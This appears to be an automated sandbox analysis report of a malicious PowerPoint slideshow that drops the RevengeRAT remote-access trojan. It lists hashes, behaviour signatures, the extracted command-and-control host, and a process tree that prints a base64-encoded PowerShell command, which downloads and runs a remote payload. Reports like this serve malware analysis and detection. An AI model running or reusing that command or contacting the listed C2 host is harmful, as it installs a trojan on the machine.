Analysis

  • max time kernel
    146s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    24-04-2023 10:05

General

  • Target

    LinhasSumizadas_2020006483.pps

  • Size

    85KB

  • MD5

    f73d28374566888ca72af46736a044c7

  • SHA1

    a4186cef906d11a1af9c064b742449c1ea0dccd5

  • SHA256

    924b64652f124bbf235affcb91f62ddd799456c8b7438842c322db64d1a3e4a4

  • SHA512

    c7460d9b69519c206bb553a37f263c178bcfd5b3c1902cd400433248f2e7b01f776c92f8eb6cafd1f11818cd097c22960744d205de73c6649e71f468ef1afc52

  • SSDEEP

    768:b2HgyYZ88pJ9lYsI4XrNK7LSdvsqQvb36aTZQSCmYDxB:bXyYZ88RlYsI4XrNKCdvgvb37VQnrx

Malware Config

Extracted

Family

revengerat

Botnet

NyanCatRevenge

C2

m7.ddns.com.br:5222

Mutex

63165e63d56748c

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RevengeRAT

    Remote-access trojan with a wide range of capabilities.

  • Blocklisted process makes network request 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" /s "C:\Users\Admin\AppData\Local\Temp\LinhasSumizadas_2020006483.pps"
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2008
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1752
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e SQBFAFgAIAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAuAEkAbgB2AG8AawBlACgAJwANAAoAaAB0AHQAcAA6AC8ALwBkAGEAbgBpAGUAbAB2AGkAZABhAGIAZQBsAGEALgA2AHQAZQAuAG4AZQB0AC8AZABvAHcAbgBsAG8AYQBkAC8ARgBhAGMAawAuAGoAcABnAA0ACgAnACkAOwAgAA0ACgB6AEIAdwB6AGMAWQBEAHoAegBuAHkAawBLAGYARwBlAEEAdwBMAE8ARQBiAEMARABWAFAAUwB3AEIARgB5AFUAVQBOAHoATgBOAEcAYwBoAEEAdABSAG8ASwBjAFYAYQBSAE0AWQBGAFAAdwBHAFgAYQBOAGMAbwBMAG8AWQBVAHgAZABvAFgATQB0AFQAVQBrAEcAUwBpAHAATgByAFQAVABTAHoATwBHAG4ARwBKAGgAYgBOAA0ACgA=""
        2⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1720
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          3⤵
            PID:1976

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Defense Evasion

      Modify Registry

      1
      T1112

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/1720-73-0x00000000022A0000-0x00000000022B8000-memory.dmp
        Filesize

        96KB

      • memory/1720-61-0x0000000002580000-0x00000000025C0000-memory.dmp
        Filesize

        256KB

      • memory/1720-60-0x0000000002580000-0x00000000025C0000-memory.dmp
        Filesize

        256KB

      • memory/1720-62-0x0000000002580000-0x00000000025C0000-memory.dmp
        Filesize

        256KB

      • memory/1720-75-0x00000000022A0000-0x00000000022B8000-memory.dmp
        Filesize

        96KB

      • memory/1720-65-0x00000000022A0000-0x00000000022B8000-memory.dmp
        Filesize

        96KB

      • memory/1720-64-0x00000000022A0000-0x00000000022B8000-memory.dmp
        Filesize

        96KB

      • memory/1720-67-0x00000000022A0000-0x00000000022B8000-memory.dmp
        Filesize

        96KB

      • memory/1720-69-0x00000000022A0000-0x00000000022B8000-memory.dmp
        Filesize

        96KB

      • memory/1720-71-0x00000000022A0000-0x00000000022B8000-memory.dmp
        Filesize

        96KB

      • memory/1976-76-0x0000000000400000-0x000000000040A000-memory.dmp
        Filesize

        40KB

      • memory/1976-80-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
        Filesize

        4KB

      • memory/1976-79-0x0000000000400000-0x000000000040A000-memory.dmp
        Filesize

        40KB

      • memory/1976-78-0x0000000000400000-0x000000000040A000-memory.dmp
        Filesize

        40KB

      • memory/1976-77-0x0000000000400000-0x000000000040A000-memory.dmp
        Filesize

        40KB

      • memory/1976-85-0x0000000000400000-0x000000000040A000-memory.dmp
        Filesize

        40KB

      • memory/1976-83-0x0000000000400000-0x000000000040A000-memory.dmp
        Filesize

        40KB

      • memory/1976-81-0x0000000000400000-0x000000000040A000-memory.dmp
        Filesize

        40KB

      • memory/1976-86-0x00000000002B0000-0x00000000002F0000-memory.dmp
        Filesize

        256KB

      • memory/2008-63-0x000000005FFF0000-0x0000000060000000-memory.dmp
        Filesize

        64KB

      • memory/2008-54-0x000000005FFF0000-0x0000000060000000-memory.dmp
        Filesize

        64KB